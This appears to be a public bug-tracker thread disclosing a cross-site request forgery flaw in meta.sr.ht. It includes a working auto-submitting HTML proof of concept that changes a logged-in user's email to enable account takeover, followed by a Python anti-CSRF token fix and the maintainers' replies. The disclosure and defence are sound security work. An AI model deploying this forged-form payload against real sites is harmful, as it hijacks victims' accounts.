The website is vulnerable to cross-site request forgery (CSRF). Attackers can host the following HTML to force a user into changing their email address to an attacker's email address.
```html
<html>
  <body>
    <!-- Hide the attacker's page path in the browser history -->
    <script>history.pushState('', '', '/')</script>
    <form action="https://meta.sr.ht/profile" method="POST">
      <input type="hidden" name="email" value="email@example.com" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="bio" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- document.forms is a collection; submit the first form in it -->
    <script>document.forms[0].submit();</script>
  </body>
</html>
```
Once a logged-in user visits the page, a POST request is made to modify their email address. The attacker then receives a confirmation email and can now perform a password reset. The request above is just an example, but will apply to any state-changing request.
Feel free to ping me if you have any other questions.
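The standard fix for the class of bug described in this ticket is a session-bound anti-CSRF token on every state-changing form, checked server-side before the handler runs. The following is an added example of that check, not meta.sr.ht's own code; it assumes a form field named `_csrf_token`, a constructed server secret, and an Origin/Referer check as defense in depth.

```python
import hmac
import hashlib

# Constructed demo secret; a real deployment loads this from configuration.
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"


def csrf_token(session_id: str) -> str:
    """Derive the per-session token (synchronizer pattern): HMAC of the session id.

    The token is rendered into every form the site serves; a cross-origin page
    cannot read it, so a forged form like the one in this ticket cannot carry it.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def is_same_origin(headers: dict, site_origin: str) -> bool:
    """Defense in depth: the browser-set Origin (or Referer) must be our own site."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == site_origin
    referer = headers.get("Referer")
    return referer is not None and referer.startswith(site_origin + "/")


def accept_profile_update(session_id: str, form: dict, headers: dict,
                          site_origin: str = "https://meta.sr.ht") -> bool:
    """Return True only if the POST carries a valid token for this session and is same-origin."""
    submitted = form.get("_csrf_token", "")
    expected = csrf_token(session_id)
    # Constant-time comparison; encode so non-ASCII input cannot raise TypeError.
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return False
    return is_same_origin(headers, site_origin)


if __name__ == "__main__":
    # Constructed requests: the forged form from the ticket vs. a legitimate submission.
    forged = {"email": "email@example.com", "url": "", "location": "", "bio": ""}
    legit = dict(forged, email="victim@example.org", _csrf_token=csrf_token("sess-1"))
    print("forged accepted:", accept_profile_update("sess-1", forged, {"Origin": "https://attacker.example"}))
    print("legit accepted:", accept_profile_update("sess-1", legit, {"Origin": "https://meta.sr.ht"}))
```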
Thank you. In the future, send security-related issues as an email, not as a public ticket.
Sorry about that. Feel free to remove this ticket then.
I have disabled this feature in meta.sr.ht in production for now, a proper fix will follow shortly.